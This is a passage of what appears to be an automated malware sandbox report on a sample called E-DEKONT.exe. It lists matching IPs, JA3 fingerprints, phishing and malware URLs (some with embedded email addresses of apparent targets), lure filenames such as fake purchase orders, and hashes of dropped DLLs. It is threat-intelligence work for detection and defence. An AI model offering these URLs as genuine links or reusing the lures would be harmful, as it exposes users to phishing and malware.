                                  http://s6gn72oxzx637aaf2343fe2.bisuits.ruGet hashmaliciousBrowse
                                  • 104.18.18.132
                                  TRUNKOZ-INTrunkozTechnologiesPvtLtdINSwift Mesaj#U0131#09971.exeGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  E-DEKONT.exeGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exeGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  swiftPa.exeGet hashmaliciousBrowse
                                  • 103.14.97.170
                                  Payment 9.10000 USD.exeGet hashmaliciousBrowse
                                  • 103.14.97.80
                                  mQhMxZDcfL.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  wxJXjeoQg5.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  c2tGrIp4er.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  Bch2kEvvA6.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  PO-468468-MES.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  https://redchillicrackers.com/wp-content/p/Get hashmaliciousBrowse
                                  • 103.14.99.122
                                  PO-20456200 Ningbo Xingrui Electronic.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  209746 -Bumet B.V.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  PO-20856200 OLEO FLEX_ PDF.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  RFQ Agencia de Aduana Pedro.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  RFQ 2046573 SNVI Group.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  RFQ Agencia de Aduana Pedro.exeGet hashmaliciousBrowse
                                  • 103.14.97.85
                                  PO 300720-FMB.exeGet hashmaliciousBrowse
                                  • 103.14.97.85

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  37f463bf4616ecd445d4a1937da06e19https://sites.google.com/view/hfcx/accueilGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  policy handbooks.htmlGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  synapse3.zipGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  http://ideentiifire.comGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  00000000.exeGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  ErwCX0jnl8.exeGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  darden.com .htmlGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  https://paper.li/lnMHi8ZFENoxtKejQDZMh/story/document-confidential-m8ZkThqLiTXweW3JUxcg2Get hashmaliciousBrowse
                                  • 103.14.99.114
                                  https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3joGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  Message.htmlGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  https://ipfs.fleek.co/ipfs/bafybeic3q6fuhi5kyycepznhhccvbdkt36zuhk6qn4hh2vwyqpoa2r3kqa#nbbebenefits@crystalco.comGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  abutmentAnemone.jpg.dllGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  Check#33743_pymntCopy_pdf.htmGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  https://u29751933.ct.sendgrid.net/ls/click?upn=CnGGOnFaxhvhWvH4Fu0DshuMMwznLhhSl0vF9VJfmXn4k3uWmXtWEXgU1gN1sOYDM-2FnTKBAYRDOo-2Fxp1e29eFw-3D-3D1SY9_-2FHydVa-2F6RgJ-2BO01uO1tSzf4k9wftL50WVzxI-2BDuM83WY91mlfH2j-2BdduOmIaC9RL57-2F4cZ8bwv5R6qDViDOPW8H7XI4v762lTVPjiQ2n2fiTT0EsPoTwZUC1VOPK6BOuruRTtU-2FIclxgJ3qp4zIBngkcg1uQEKF68oozcL-2BfK4GoB5e-2BnOh4XhI8nLZlju2lQTsa8dPRVDT7dRrjRlibaPNNXjuJ6PKaJjbMu-2Bzfm-2F8-3DGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  https://linkprotect.cudasvc.com/url?a=https%3a%2f%2flnewmanbunnellelectric.com%2f&c=E,1,-SmOrItRkzmIjK3rKUS4lI02RvsfWzGdZ1HnCIT5Pt230osjD6mDrVCNiu4teQwo-lwx2RA8Bs1QUO7XeVgh7bu1527soTNm0HME39Y1hPc-NQmLQw,,&typo=1Get hashmaliciousBrowse
                                  • 103.14.99.114
                                  http://www.fpat.infoGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  https://mailsrver.contributes.rest/databases.html?home=sculver@glenergy.comGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  45FRI 36545.htmGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  BL-NO-OOLU2136901180.vbsGet hashmaliciousBrowse
                                  • 103.14.99.114
                                  Services_Jingce_Quotation28112022.exeGet hashmaliciousBrowse
                                  • 103.14.99.114

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dllt8B2Qcl0nS.exeGet hashmaliciousBrowse
                                    PO No. 3200005919.exeGet hashmaliciousBrowse
                                      Swift Mesaj#U0131#09971.exeGet hashmaliciousBrowse
                                        E-DEKONT.exeGet hashmaliciousBrowse
                                          VAN66789.exeGet hashmaliciousBrowse
                                            e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exeGet hashmaliciousBrowse
                                              MhQTqiCvm1.exeGet hashmaliciousBrowse
                                                PROFORMA-418340-2022.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Win32.BotX-gen.30874.3243.exeGet hashmaliciousBrowse
                                                      Fedex No71502.exeGet hashmaliciousBrowse
                                                        gunzipped.exeGet hashmaliciousBrowse
                                                          PO110859600.jsGet hashmaliciousBrowse
                                                            cH9kNQjk7C.jarGet hashmaliciousBrowse
                                                              PO-11085960.jsGet hashmaliciousBrowse
                                                                879-5160.jsGet hashmaliciousBrowse
                                                                  Orderlist.jarGet hashmaliciousBrowse
                                                                    e-dekont.pdf.exeGet hashmaliciousBrowse
                                                                      Dekont.exeGet hashmaliciousBrowse
                                                                        e-dekont.pdf.exeGet hashmaliciousBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Temp\444685002784711619507383.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 22, 1st free page 7, free pages 2, cookie 0x10, schema 4, UTF-8, version-valid-for 3
                                                                          Category:dropped
                                                                          Size (bytes):45056
                                                                          Entropy (8bit):0.7853305971874845
                                                                          Encrypted:false
                                                                          SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                                                          MD5:00C036C61F625BF9D25362B9BE24ADEB
                                                                          SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                                                          SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                                                          SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.080160932980843
                                                                          Encrypted:false
                                                                          SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                                                          MD5:502263C56F931DF8440D7FD2FA7B7C00
                                                                          SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                                                          SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                                                          SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: t8B2Qcl0nS.exe, Detection: malicious, Browse
                                                                          • Filename: PO No. 3200005919.exe, Detection: malicious, Browse
                                                                          • Filename: Swift Mesaj#U0131#09971.exe, Detection: malicious, Browse
                                                                          • Filename: E-DEKONT.exe, Detection: malicious, Browse
                                                                          • Filename: VAN66789.exe, Detection: malicious, Browse
                                                                          • Filename: e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exe, Detection: malicious, Browse
                                                                          • Filename: MhQTqiCvm1.exe, Detection: malicious, Browse
                                                                          • Filename: PROFORMA-418340-2022.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Win32.BotX-gen.30874.3243.exe, Detection: malicious, Browse
                                                                          • Filename: Fedex No71502.exe, Detection: malicious, Browse
                                                                          • Filename: gunzipped.exe, Detection: malicious, Browse
                                                                          • Filename: PO110859600.js, Detection: malicious, Browse
                                                                          • Filename: cH9kNQjk7C.jar, Detection: malicious, Browse
                                                                          • Filename: PO-11085960.js, Detection: malicious, Browse
                                                                          • Filename: 879-5160.js, Detection: malicious, Browse
                                                                          • Filename: Orderlist.jar, Detection: malicious, Browse
                                                                          • Filename: e-dekont.pdf.exe, Detection: malicious, Browse
                                                                          • Filename: Dekont.exe, Detection: malicious, Browse
                                                                          • Filename: e-dekont.pdf.exe, Detection: malicious, Browse
                                                                          Reputation:high, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.093995452106596
                                                                          Encrypted:false
                                                                          SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                                                          MD5:CB978304B79EF53962408C611DFB20F5
                                                                          SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                                                          SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                                                          SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.1028816880814265
                                                                          Encrypted:false
                                                                          SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                                                          MD5:88FF191FD8648099592ED28EE6C442A5
                                                                          SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                                                          SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                                                          SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.126358371711227
                                                                          Encrypted:false
                                                                          SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                                                          MD5:6D778E83F74A4C7FE4C077DC279F6867
                                                                          SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                                                          SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                                                          SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):21816
                                                                          Entropy (8bit):7.014255619395433
                                                                          Encrypted:false
                                                                          SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                                                          MD5:94AE25C7A5497CA0BE6882A00644CA64
                                                                          SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                                                          SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                                                          SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.112057846012794
                                                                          Encrypted:false
                                                                          SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                          MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                          SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                          SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                          SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.166618249693435
                                                                          Encrypted:false
                                                                          SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                          MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                          SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                                          SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                          SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.1117101479630005
                                                                          Encrypted:false
                                                                          SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                          MD5:6DB54065B33861967B491DD1C8FD8595
                                                                          SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                          SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                          SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.174986589968396
                                                                          Encrypted:false
                                                                          SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                          MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                          SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                          SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                          SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):17856
                                                                          Entropy (8bit):7.076803035880586
                                                                          Encrypted:false
                                                                          SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                          MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                          SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                          SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                          SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.131154779640255
                                                                          Encrypted:false
                                                                          SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                          MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                          SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                          SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                          SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):20792
                                                                          Entropy (8bit):7.089032314841867
                                                                          Encrypted:false
                                                                          SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                          MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                          SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                          SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                          SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
